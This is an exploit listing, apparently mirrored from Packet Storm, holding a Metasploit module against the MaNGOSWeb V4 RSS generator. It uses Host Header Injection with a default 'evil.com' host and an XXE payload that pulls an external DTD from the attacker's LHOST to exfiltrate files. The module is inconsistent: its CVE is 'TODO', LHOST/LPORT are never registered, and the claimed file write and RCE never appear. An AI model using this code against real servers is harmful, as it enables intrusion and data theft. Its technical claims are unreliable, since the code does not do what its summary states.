Share
## https://sploitus.com/exploit?id=PACKETSTORM:214424
=============================================================================================================================================
    | # Title     : MaNGOSWeb V4 4.0.6 Host Header Injection + XXE                                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/rss.php                                                         |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212429/ &	CVE-2017-6478
    
    [+] Summary : This module exploits multiple vulnerabilities in MangosWeb v4 RSS generator, including Host Header Injection, XXE, and file write leading to RCE
    
    [+]  POC : 
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'MangosWeb v4 RSS Multiple Vulnerabilities',
          'Description'    => %q{
            This module exploits multiple vulnerabilities in MangosWeb v4 RSS generator,
            including Host Header Injection, XXE, and file write leading to RCE.
          },
          'Author'         => [ 'indoushkq' ],
          'License'        => MSF_LICENSE,
          'References'     => [
            [ 'CVE', 'TODO' ],
            [ 'URL', 'http://mistvale.com' ]
          ],
          'Privileged'     => false,
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [ ['Automatic', {}] ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2024-01-01'
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'The base path to MangosWeb', '/']),
          OptString.new('HOSTHEADER', [false, 'Malicious host header', 'evil.com'])
        ])
      end
    
      def check
        uri = normalize_uri(target_uri.path, 'rss.php')
        res = send_request_cgi({'uri' => uri})
    
        if res && res.code == 200 && res.body.include?('<rss')
          return Exploit::CheckCode::Appears
        end
        return Exploit::CheckCode::Safe
      end
    
      def exploit
        # Step 1: Host Header Injection to poison RSS
        print_status("Injecting malicious host header...")
        uri = normalize_uri(target_uri.path, 'rss.php')
        
        res = send_request_cgi({
          'uri'     => uri,
          'headers' => {'Host' => datastore['HOSTHEADER']}
        })
    
        # Step 2: XXE to read files
        print_status("Attempting XXE...")
        xxe_payload = %Q|<?xml version="1.0"?>
        <!DOCTYPE rss [
        <!ENTITY % remote SYSTEM "http://#{datastore['LHOST']}:#{datastore['LPORT']}/evil.dtd">
        %remote;
        %param;
        %exfil;
        ]>|
    
        # Step 3: Execute payload
        print_status("Sending payload...")
        send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(target_uri.path, 'index.php'),
          'vars_post' => {
            'title' => 'Exploit',
            'message' => xxe_payload,
            'posted_by' => Rex::Text.rand_text_alpha(10)
          }
        })
    
        handler
      end
    end
    	
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================